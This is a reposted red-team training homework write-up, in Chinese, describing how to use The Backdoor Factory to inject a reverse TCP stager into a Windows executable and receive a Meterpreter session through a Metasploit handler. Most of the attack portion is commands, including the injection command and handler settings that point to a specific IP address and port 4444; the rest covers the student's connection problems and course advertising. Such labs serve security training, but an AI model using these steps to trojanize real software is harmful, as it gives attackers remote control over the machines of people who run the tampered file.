红队培训班作业 | backdoor制作后门文件并上线MSF

admin 2021年11月24日03:27:35评论117 views字数 1167阅读3分53秒阅读模式

文章来源|MS08067 红队培训班第9节课作业

本文作者:莫名的Low(红队培训班学员)


按老师要求完成布置的作业如下:


backdoor下载地址:https://github.com/secretsquirrel/the-backdoor-factory


docker下载⽅式

docker pull secretsquirrel/the-backdoor-factorydocker run -it secretsquirrel/the-backdoor-factorybash# ./backdoor.py

docker复制⽂件操作命令

# 从本机复制⽂件到dockerdocker cp /Users/apple/Desktop/qudong.exe0a6bd922d35d:/root/# 从docker复制⽂件到本机docker cp 0a6bd922d35d:/the-backdoor-factory/backdoored/1.exe /Users/apple/Desktop/

查看该应⽤程序是否可以植⼊后⻔

./backdoor.py -f /root/qudong.exe -S


红队培训班作业 | backdoor制作后门文件并上线MSF


查看该应⽤程序的内存缝隙

./backdoor.py -f /root/qudong.exe -c


红队培训班作业 | backdoor制作后门文件并上线MSF


查看可以使⽤的poc

./backdoor.py -f /root/qudong.exe -s show


红队培训班作业 | backdoor制作后门文件并上线MSF


设置监听地址和端⼝还有poc

./backdoor.py -f /root/qudong.exe -s

iat_reverse_tcp_stager_threaded -H 195.133.8.209 -P 4444 -o 1.exe

选择植⼊到哪个内存缝隙中,这⾥选择2


红队培训班作业 | backdoor制作后门文件并上线MSF


将⽂件复制到靶机中,点击运⾏,msf成功上线


红队培训班作业 | backdoor制作后门文件并上线MSF


msf配置⽅法

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 195.133.8.209run


问题:

1、靶机上的恶意程序总是会⾃动退出,在任务管理器⾥看程序运⾏⼀会就会⾃动退出,有时候获取了meterpreter过⼀会也会断联,很不稳定

红队培训班作业 | backdoor制作后门文件并上线MSF


2、设置的后⻔⽂件⽆法连接公⽹地址,我将靶机设置为桥接模式然后运⾏backdoor后⻔⽂件也⽆法连接上,只有msf和靶机均在nat模式下的局域⽹内才能监听到


号外

红队安全培训 第二期班 预计8月13号开班,第二期的课程大纲目录根据第一期班的同学的反馈和要求,会有重大调整,增加了更多的实战中红队的渗透思路和实战技巧干货,具体授课目录可联系小客服获取!

红队培训班作业 | backdoor制作后门文件并上线MSF



扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

红队培训班作业 | backdoor制作后门文件并上线MSF 红队培训班作业 | backdoor制作后门文件并上线MSF

红队培训班作业 | backdoor制作后门文件并上线MSF红队培训班作业 | backdoor制作后门文件并上线MSF

红队培训班作业 | backdoor制作后门文件并上线MSF 红队培训班作业 | backdoor制作后门文件并上线MSF

来和5000+位同学一起加入星球学习吧!


红队培训班作业 | backdoor制作后门文件并上线MSF

本文始发于微信公众号(Ms08067安全实验室):红队培训班作业 | backdoor制作后门文件并上线MSF

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月24日03:27:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队培训班作业 | backdoor制作后门文件并上线MSFhttp://cn-sec.com/archives/431127.html

发表评论

匿名网友 填写信息